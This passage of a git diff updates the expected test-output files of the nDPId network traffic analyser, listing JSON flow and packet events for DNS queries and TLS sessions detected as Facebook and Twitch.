+00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"tk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613939315127,"flow_last_seen":1613939315127,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1613939315127,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":55591,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"whois.dot.tk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"tk.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1613939315183,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":131,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":131,"pkt_l4_len":97,"thread_ts_msec":1613939315183,"pkt":"KDc3AG3IEBMx8Tl2CABFAAB1z01AADkR7ibAqAEBwKgBsgA12ScAYQAAOWmBgAABAAAAAQAABXdob2lzA2RvdAJ0awAAHAABwBIABgABAAAOEAAvA25zMQNkbnPAFgNzb2EHZnJlZW5vbQNjb20AYBhZHgAAA4QAABwgAAk6gAAAHCA="} -00767{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"tk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1613939315127,"flow_last_seen":1613939315183,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":119,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1613939315183,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":55591,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"whois.dot.tk","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00767{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"tk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1613939315127,"flow_last_seen":1613939315183,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":119,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1613939315183,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":55591,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"whois.dot.tk","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"tk.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613939315184,"flow_last_seen":1613939315184,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1613939315184,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":53820,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"tk.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1613939315184,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1613939315184,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA6otUAAEARU9rAqAGywKgBAdI8ADUAJlfumIYBAAABAAAAAAAABXdob2lzA2RvdAJ0awAADwAB"} 
-00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"tk.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613939315184,"flow_last_seen":1613939315184,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1613939315184,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":53820,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"whois.dot.tk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":15,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"tk.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613939315184,"flow_last_seen":1613939315184,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1613939315184,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":53820,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"whois.dot.tk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":15,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"tk.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1613939315239,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":131,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":131,"pkt_l4_len":97,"thread_ts_msec":1613939315239,"pkt":"KDc3AG3IEBMx8Tl2CABFAAB1ZXdAADkRV\/3AqAEBwKgBsgA10jwAYQAAmIaBgAABAAAAAQAABXdob2lzA2RvdAJ0awAADwABwBIABgABAAAOEAAvA25zMQNkbnPAFgNzb2EHZnJlZW5vbQNjb20AYBhZHgAAA4QAABwgAAk6gAAAHCA="} -00767{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"tk.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1613939315184,"flow_last_seen":1613939315239,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":119,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1613939315239,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":53820,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"whois.dot.tk","num_queries":1,"num_answers":1,"reply_code":0,"query_type":15,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"tk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1613939315127,"flow_last_seen":1613939315183,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":119,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1613939315239,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":55591,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"tk.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1613939315184,"flow_last_seen":1613939315239,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":119,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1613939315239,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":53820,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"tk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1613939315029,"flow_last_seen":1613939315127,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1613939315239,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":51954,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00767{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"tk.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1613939315184,"flow_last_seen":1613939315239,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":119,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1613939315239,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":53820,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"whois.dot.tk","num_queries":1,"num_answers":1,"reply_code":0,"query_type":15,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"tk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1613939315127,"flow_last_seen":1613939315183,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":119,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1613939315239,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":55591,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"tk.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1613939315184,"flow_last_seen":1613939315239,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":119,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1613939315239,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":53820,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
+00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"tk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1613939315029,"flow_last_seen":1613939315127,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1613939315239,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":51954,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00547{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":6,"source":"tk.pcap","alias":"nDPId-test","packets-captured":6,"packets-processed":6,"total-skipped-flows":0,"total-l4-payload-len":314,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":3,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":21,"global_ts_msec":1613939315239} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 6/6 @@ -27,9 +27,9 @@ ~~ total active/idle flows...: 3/3 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5871737 bytes -~~ total memory freed........: 5871737 bytes -~~ total allocations/frees...: 118128/118128 +~~ total memory allocated....: 6005371 bytes +~~ total memory freed........: 6005371 bytes +~~ total allocations/frees...: 120890/120890 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 458 chars ~~ json string max len.......: 777 chars diff --git a/test/results/tls-appdata.pcap.out b/test/results/tls-appdata.pcap.out index 87f1885d2..bd39ee39e 100644 
--- a/test/results/tls-appdata.pcap.out +++ b/test/results/tls-appdata.pcap.out 
@@ -2,21 +2,21 @@ 00551{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"tls-appdata.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1642636825083} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tls-appdata.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1642636825083,"flow_last_seen":1642636825083,"flow_idle_time":7580000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"thread_ts_msec":1642636825083,"l3_proto":"ip4","src_ip":"179.60.195.173","dst_ip":"192.168.2.100","src_port":443,"dst_port":60636,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00684{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls-appdata.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1642636825083,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"thread_ts_msec":1642636825083,"pkt":"YDjgxTWgeJS0JASgCABFAADTdsZAAFQGdWizPMOtwKgCZAG77NyYT4Q6bz7CkoAYARcapAAAAQEICuA9efAA6xLnFwMDAJq6kl+L8CkANElxlxEecHMQmMQNkeaHxIp41zgnfTmHWl1kbYylGWBjaZG2NzJzlVXZWLztslEjbtyBdUs5oPdXaxkx+\/Qqz25LpRnvI2Oa6mejiJQ6cva3m1sq7WKg7Tr1kRyTeD3F3LCkV1iqkLWh7Tv+UIHyUeGMLTuUM2Ln4Jd+SMy0A0nofS3noQlT0jEHIJotqStJgnoJ"} 
-00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"tls-appdata.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1642636825083,"flow_last_seen":1642636825083,"flow_idle_time":7580000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"thread_ts_msec":1642636825083,"l3_proto":"ip4","src_ip":"179.60.195.173","dst_ip":"192.168.2.100","src_port":443,"dst_port":60636,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"tls-appdata.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1642636825083,"flow_last_seen":1642636825083,"flow_idle_time":7580000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"thread_ts_msec":1642636825083,"l3_proto":"ip4","src_ip":"179.60.195.173","dst_ip":"192.168.2.100","src_port":443,"dst_port":60636,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 00656{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls-appdata.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1642636825184,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":201,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":201,"pkt_l4_len":167,"thread_ts_msec":1642636825184,"pkt":"YDjgxTWgeJS0JASgCABFAAC7dsdAAFQGdX+zPMOtwKgCZAG77NyYT4TZbz7CkoAYARcjxAAAAQEICuA9elQA6xLnFwMDAIJ8qPBKps43VjN1CWNCU\/WQelHzsIBMbYPAQ\/uBSeCttdwQAVQSVQY\/KbbED1BcMIjBMrVVvujIJVS8087\/CMQGAwaAK+HgSw64pU81VCnjfYTfRMnDYpHQuxsdF63QBFPXffdndgc5510Oi0rcddoDPyb3I5kt\/aPyPwwpROArhlOP"} 
00656{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls-appdata.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1642636825195,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":201,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":201,"pkt_l4_len":167,"thread_ts_msec":1642636825195,"pkt":"YDjgxTWgeJS0JASgCABFAAC7dshAAFQGdX6zPMOtwKgCZAG77NyYT4TZbz7CkoAYARcjuQAAAQEICuA9el8A6xLnFwMDAIJ8qPBKps43VjN1CWNCU\/WQelHzsIBMbYPAQ\/uBSeCttdwQAVQSVQY\/KbbED1BcMIjBMrVVvujIJVS8087\/CMQGAwaAK+HgSw64pU81VCnjfYTfRMnDYpHQuxsdF63QBFPXffdndgc5510Oi0rcddoDPyb3I5kt\/aPyPwwpROArhlOP"} 00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":7,"source":"tls-appdata.pcap","alias":"nDPId-test","packets-captured":7,"packets-processed":6,"total-skipped-flows":0,"total-l4-payload-len":429,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1643610288722} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"tls-appdata.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643610288722,"flow_last_seen":1643610288722,"flow_idle_time":7580000,"flow_min_l4_payload_len":1452,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1452,"flow_avg_l4_payload_len":1452,"midstream":1,"thread_ts_msec":1643610288722,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"52.223.198.7","src_port":58976,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
02411{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"tls-appdata.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1643610288722,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1643610288722,"pkt":"eJS0JASgYDjgxTWgCABFAAXUr1ZAAG4GmdrAqAJkNN\/GB+ZgAbs5J4UhnRUwIFAQJz3DuQAAFwMDBbsPVRnTUZmGPBlnKdgK94iLfa1WzOumranE61s0xvAtVjrmnivoUriXENTZHZ6xJ+jtI02SpI1pRFy9oatnRAti+z3dflh9zDeImNOzWaaReV7pRcOrrq7tetZhYkU+J8nisBJ42M5+CPOJz2x9RWtShEja6uVC5aX31AdfQo20rLfO\/h359IB7fzanuauTs\/HdR9kryxM8fpmunMnX8WXp67VFyeXC9tn4sMVL2L1iFuAZ2WReqtOFPjc27OdH3FdONsJrS3rdK2QVlml0LGbtHI9L05So1IHq5iGWqnYrZQ589c78wmLTg0z6Ka0yN+W3FGjoIGV3+LcQLvz6QRgjR\/kIHAJohOAQCxTc9V8F6Gv4p79TOjrL8QYreKxwrcyV7t0\/ffxHqa6wsgnwahqHz5mGSmBc+NEk20kRh8LU5Ux04uV1MrApZkpFkwVelAuPdI3nbz4UYiSP08RLjt7FwNdonwA2wk0UsATBQ2iYBLpKcWy8MNYJXPH2+OoHv7AYz4ifKDgWz1xsViG63GdMyM6QWXC1knvXeFbsFV0zb686r04l1qD5DGVWted1hpWErKnl1mFLjhp7NBh19Fu92aw6Pp1LmbPygTeDVvX2BkgA980SLqucCK1QQ\/87Y2y1rEMBDJI337XRO9fLLom3N1GZGcfdjcOmFx23h3Xsl+JOKuIRqUHcNjsuWmsI93vxv7AiXhfl3ON6PBpCzXsWfQd5CnOow3DrBISIOf0QBKNxmFchEodhvvam7eYuYBOrQVQbZqwqAEmXVvmKkPfxg11O7945k9bJbHrHGnTHIJFPF8Wi5iInrrMIczLCm1Ty3X1uvh+KSzqOKu23gp0oy8tw8FSTiaFy88XbiN7NdhsKDDqcgzhRWXEyoPsqv8ZLHWmNQtFHEc1otdBhKSXxBo4sSfSRCFeFjnRiWuoJkIwrZr\/BJCPDk0kJntgUkKLVBB9u32VxY3auwEwW8zwog0Kk3+GGDIkvqFTJNbiOxAZx3Bh00tLdNxMKdSO2fUGW4NL+WwwvLg+eGNlmxqkHecoyIHU6SnMN0ibGz7t0FimXl9FSI77SBAp8XGca7+fLewD9OHIgZzvqQJhSicTTl9ZflYmqdns0hrrJmkNCykZ4VHxI+domV7DRJABw2KvQ0HwDx5SMRpKeA2sueP598Raa+9F37mFZha6n1dhCKRSIkHPBCXwqEfhybcdOppz7dducg\/rDRmksOfTm7RdRFeBiYRjuqqdrpfrvqj4+n50RtPuOEamaACLRJe6TZ7AW60wNgZ4dbP5mBUOsUL+tGIvS3nrV+yuTsPHrJLA6h95nQQJJp1gPln6Nqwtu9dkRRA6KEKJsdtHc3JqWZjaSLJzaseg\/8y7N52Wwn6qAh47XHIlR\/ujrZyknuYN7irKa4apesgI2eDCnzFOHgd17m7AHq7vKvKmnQgplT+sFJcUwVu3nfqOhQjoDv02P5GlZXrAskO+6m+j9jtZMWk5ljB89fKaXNeLo2zjdBvluIThOvbDD4q
SD+Jyi+\/ACr297jxF4hgS34EXR2bPMBCWBQ7weITTmdrwxEGtvfRK6RrUaKt0mA7Mmh2K3xkeJIyTQWAWBfCDfp+4+jtl\/HFNZ3X72EWk2uH6pI3SkOAUM71ZFkDV0zGFae0Xl1Uvj44SLDq0NxVlzOiFLtUYYjE6EZp45LPVhL8l6xcclI4RpJZwSBG5E9xwp658S+bV\/0zFdLWUxoCdi1hOVc+KmQMRQFDNgNxnLdxBG\/I6e1KPzAP3ozk4qy5VXGqPMtnuKoWBMuYqKTJjEAlG62upJHVz1g7aZjkN7ewqhTZXT4U3\/nLD+KKBpRA+6aGJQ3Wk\/Yc7YyxkVi+HCxxNdytkZcR22mmETB+o4WMzW60Iu0eFVoPREMdUcI4HUkA0F\/UGykYOAX3kyJbTw"} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"tls-appdata.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1643610288724,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1643610288724,"pkt":"eJS0JASgYDjgxTWgCABFAAA8r1dAAG4Gn3HAqAJkNN\/GB+ZgAbs5J4rNnRUwIFAYJz2+IQAAaUBxB\/Gc\/nglm3L+T6FaB1y1dAs="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"tls-appdata.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1643610288722,"flow_last_seen":1643610288724,"flow_idle_time":7580000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":736,"midstream":1,"thread_ts_msec":1643610288724,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"52.223.198.7","src_port":58976,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitch","breed":"Fun","category":"Video"}} 
+00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"tls-appdata.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1643610288722,"flow_last_seen":1643610288724,"flow_idle_time":7580000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":736,"midstream":1,"thread_ts_msec":1643610288724,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"52.223.198.7","src_port":58976,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Twitch","breed":"Fun","category":"Video"}} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"tls-appdata.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1643610288737,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1643610288737,"pkt":"YDjgxTWgeJS0JASgCABFAAAoJklAADkGXZQ038YHwKgCZAG75mCdFTAgOSeK4VAQCRZvcQAAAAAAAAAA"} 00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":31,"source":"tls-appdata.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1642636825083,"flow_last_seen":1642636825303,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":429,"flow_avg_l4_payload_len":71,"midstream":1,"thread_ts_msec":1643610288741,"l3_proto":"ip4","src_ip":"179.60.195.173","dst_ip":"192.168.2.100","src_port":443,"dst_port":60636,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00655{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":38,"source":"tls-appdata.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1643610288722,"flow_last_seen":1643610304703,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":34835,"flow_avg_l4_payload_len":1088,"midstream":1,"thread_ts_msec":1643610304703,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"52.223.198.7","src_port":58976,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitch","breed":"Fun","category":"Video"}} +00655{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":38,"source":"tls-appdata.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1643610288722,"flow_last_seen":1643610304703,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":34835,"flow_avg_l4_payload_len":1088,"midstream":1,"thread_ts_msec":1643610304703,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"52.223.198.7","src_port":58976,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Twitch","breed":"Fun","category":"Video"}} 